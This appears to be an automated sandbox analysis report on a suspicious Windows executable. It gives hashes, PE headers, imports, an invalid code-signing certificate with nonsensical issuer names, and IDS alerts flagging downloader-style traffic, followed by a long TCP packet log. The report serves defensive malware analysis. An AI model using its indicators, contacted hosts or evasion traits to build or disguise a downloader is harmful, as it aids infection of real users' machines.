SHA512:	c2cee48e6c124cbcd2a09e0d0381f38d2602522a5b57577b039aaeb43e4611313c1865c00a98cabacd1edca8b43bbcbad0f6fbb8594c0c36bf4438c57708eaa4
SSDEEP:	12288:g93jlsINtJD2SoxlyLpJdNLNrDv7ucLrv70:g93jlsyUSQ8LpJdNLNrjNPvY
TLSH:	B3C4D098B5A64925C69D0134A2637A0EC27D9FD621E6D042FB757E33F931BACBF00643
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L....c.W.................^.........

File Icon


Icon Hash:	1956767870707155

Static PE Info

General

Entrypoint:	0x40322b
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x57956393 [Mon Jul 25 00:55:47 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	4f67aeda01a0484282e8c59006b0b352

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Efterslag, E=Pelycography@Terminologisk.Stj, O=Efterslag, L=San Diego, OU="Undervisningsprogram Svinerier Valutahandleres ", S=California, C=US
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	21/02/2024 00:15:36 20/02/2025 00:15:36
Subject Chain	CN=Efterslag, E=Pelycography@Terminologisk.Stj, O=Efterslag, L=San Diego, OU="Undervisningsprogram Svinerier Valutahandleres ", S=California, C=US
Version:	3
Thumbprint MD5:	C0A4DEE4B4AD33337D1CEE01DE5E8EBB
Thumbprint SHA-1:	CCC980DC70EC412EC8A8392BCB2D1EE5FCD35087
Thumbprint SHA-256:	2DD81054DA8DE082C941951A84A29B717FB9BD3DB1623313A4DE86F267B1C8AC
Serial:	762602107C6944D08071AB99AC2BEAF994FB15A6

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409130h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407120h]
call dword ptr [004070ACh]
cmp ax, 00000006h
je 00007F0A8C91F983h
push ebx
call 00007F0A8C922909h
cmp eax, ebx
je 00007F0A8C91F979h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007F0A8C922885h
push esi
call dword ptr [004070A8h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F0A8C91F95Dh
push ebp
push 00000009h
call 00007F0A8C9228DCh
push 00000007h
call 00007F0A8C9228D5h
mov dword ptr [00423724h], eax
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [004237D8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041ECF0h
call dword ptr [00407174h]
push 004091ECh
push 00422F20h
call 00007F0A8C9224FFh
call dword ptr [004070A4h]
mov ebp, 00429000h
push eax
push ebp
call 00007F0A8C9224EDh
push ebx
call dword ptr [00407154h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7428	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x38000	0x1bec0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x8b090	0x780
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5dc5	0x5e00	566b191b40fde4369ae73a05b57df1d2	False	0.6685089760638298	data	6.47110609300208	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1246	0x1400	6389f916226544852e494114faf192ad	False	0.4271484375	data	5.0003960999706765	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1a818	0x400	72dcd89e8824ae186467be61797ed81e	False	0.6474609375	data	5.220595003364983	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x24000	0x14000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x38000	0x1bec0	0x1c000	3d561cd710712943d7c2ece81602a3e4	False	0.42149135044642855	data	5.782312893766128	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x382f8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 0	English	United States	0.1945019519697149
RT_ICON	0x48b20	0x65dd	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9937109330060974
RT_ICON	0x4f100	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.35518672199170126
RT_ICON	0x516a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.43363039399624764
RT_ICON	0x52750	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	English	United States	0.5209016393442623
RT_ICON	0x530d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.62677304964539
RT_DIALOG	0x53540	0x100	data	English	United States	0.5234375
RT_DIALOG	0x53640	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x53760	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x53828	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x53888	0x5a	data	English	United States	0.7888888888888889
RT_VERSION	0x538e8	0x294	OpenPGP Secret Key	English	United States	0.5242424242424243
RT_MANIFEST	0x53b80	0x33d	XML 1.0 document, ASCII text, with very long lines (829), with no line terminators	English	United States	0.5536791314837153

Imports

DLL	Import
KERNEL32.dll	CopyFileA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetFileAttributesA, SetFileAttributesA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, GetCurrentProcess, GetFullPathNameA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, lstrcpynA, SetErrorMode, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-19T08:19:27.822396+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49797	216.58.208.238	443	TCP
2024-12-19T08:19:35.844427+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49820	193.122.130.0	80	TCP
2024-12-19T08:19:38.266331+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49820	193.122.130.0	80	TCP
2024-12-19T08:19:40.133637+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49831	172.67.177.134	443	TCP
2024-12-19T08:19:41.407147+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49837	193.122.130.0	80	TCP
2024-12-19T08:19:43.022710+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49843	172.67.177.134	443	TCP
2024-12-19T08:19:44.297581+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49845	193.122.130.0	80	TCP
2024-12-19T08:19:45.902409+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49850	172.67.177.134	443	TCP
2024-12-19T08:19:54.666017+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49876	172.67.177.134	443	TCP
2024-12-19T08:19:57.551048+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49883	172.67.177.134	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 08:19:25.209011078 CET	49797	443	192.168.2.4	216.58.208.238
Dec 19, 2024 08:19:25.209063053 CET	443	49797	216.58.208.238	192.168.2.4
Dec 19, 2024 08:19:25.209137917 CET	49797	443	192.168.2.4	216.58.208.238
Dec 19, 2024 08:19:25.226397991 CET	49797	443	192.168.2.4	216.58.208.238
Dec 19, 2024 08:19:25.226414919 CET	443	49797	216.58.208.238	192.168.2.4
Dec 19, 2024 08:19:26.919528008 CET	443	49797	216.58.208.238	192.168.2.4
Dec 19, 2024 08:19:26.919605970 CET	49797	443	192.168.2.4	216.58.208.238
Dec 19, 2024 08:19:26.920274973 CET	443	49797	216.58.208.238	192.168.2.4
Dec 19, 2024 08:19:26.920325994 CET	49797	443	192.168.2.4	216.58.208.238
Dec 19, 2024 08:19:26.993221998 CET	49797	443	192.168.2.4	216.58.208.238
Dec 19, 2024 08:19:26.993249893 CET	443	49797	216.58.208.238	192.168.2.4
Dec 19, 2024 08:19:26.993612051 CET	443	49797	216.58.208.238	192.168.2.4
Dec 19, 2024 08:19:26.993673086 CET	49797	443	192.168.2.4	216.58.208.238
Dec 19, 2024 08:19:26.997903109 CET	49797	443	192.168.2.4	216.58.208.238
Dec 19, 2024 08:19:27.043337107 CET	443	49797	216.58.208.238	192.168.2.4
Dec 19, 2024 08:19:27.822417021 CET	443	49797	216.58.208.238	192.168.2.4
Dec 19, 2024 08:19:27.822482109 CET	49797	443	192.168.2.4	216.58.208.238
Dec 19, 2024 08:19:27.822509050 CET	443	49797	216.58.208.238	192.168.2.4
Dec 19, 2024 08:19:27.822557926 CET	49797	443	192.168.2.4	216.58.208.238
Dec 19, 2024 08:19:27.822640896 CET	49797	443	192.168.2.4	216.58.208.238
Dec 19, 2024 08:19:27.822679043 CET	443	49797	216.58.208.238	192.168.2.4
Dec 19, 2024 08:19:27.822773933 CET	49797	443	192.168.2.4	216.58.208.238
Dec 19, 2024 08:19:27.991338968 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:27.991379023 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:27.991827965 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:27.991827965 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:27.991858006 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:29.687480927 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:29.687601089 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:29.691344023 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:29.691351891 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:29.691627026 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:29.692790031 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:29.693264961 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:29.739336014 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:32.907169104 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:32.907356024 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:32.920691967 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:32.920793056 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.027561903 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.027668953 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.031677008 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.031775951 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.031789064 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.031919003 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.098907948 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.098985910 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.102828026 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.102890015 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.102921963 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.102988005 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.108644962 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.108704090 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.116442919 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.116513014 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.117856026 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.117917061 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.125576973 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.125754118 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.129060030 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.129127026 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.134716034 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.134785891 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.142973900 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.143114090 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.146764040 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.146853924 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.156254053 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.156424046 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.159255028 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.159333944 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.170013905 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.170094013 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.172811031 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.172893047 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.183691025 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.183801889 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.186572075 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.186671019 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.197371960 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.197467089 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.200314045 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.200402021 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.211721897 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.211806059 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.214561939 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.214764118 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.224622965 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.224708080 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.224720001 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.224770069 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.238199949 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.238272905 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.255292892 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.255351067 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.255409956 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.255464077 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.290862083 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.290944099 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.290958881 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.291038990 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.294002056 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.294071913 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.294110060 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.294233084 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.298683882 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.298739910 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.301594019 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.301680088 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.301686049 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.301781893 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.313262939 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.313400984 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.313447952 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.313447952 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.313457012 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.313550949 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.324243069 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.324301958 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.324382067 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.324465036 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.335062027 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.335134029 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.335139990 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.335262060 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.345211029 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.345340014 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.345347881 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.345462084 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.355196953 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.355256081 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.355262995 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.355330944 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.365557909 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.365623951 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.365632057 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.365859985 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.375422955 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.375513077 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.375535965 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.375605106 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.385557890 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.385634899 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.385643005 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.385751009 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.395719051 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.395803928 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.395809889 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.395883083 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.405216932 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.405278921 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.405349970 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.405479908 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.414545059 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.414602995 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.414611101 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.414721012 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.423455000 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.423580885 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.423592091 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.423682928 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.432112932 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.432168007 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.432173967 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.432224035 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.432229042 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.432281971 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.433450937 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.433629036 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.440706968 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.440773964 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.441894054 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.441948891 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.448899031 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.448997974 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.450186968 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.450262070 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.455544949 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.455609083 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.456933975 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.457123995 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.465087891 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.465152025 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.466334105 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.466398954 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.468249083 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.468372107 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.469767094 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.470048904 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.474734068 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.474822044 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.476017952 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.476078987 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.483125925 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.483206034 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.484266996 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.484334946 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.487561941 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.487627029 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.488852978 CET	443	49806	172.217.17.65	192.168.2.4
Dec 19, 2024 08:19:33.488944054 CET	49806	443	192.168.2.4	172.217.17.65
Dec 19, 2024 08:19:33.492970943 CET	443	49806	172.217.17.65	192.168.2.4
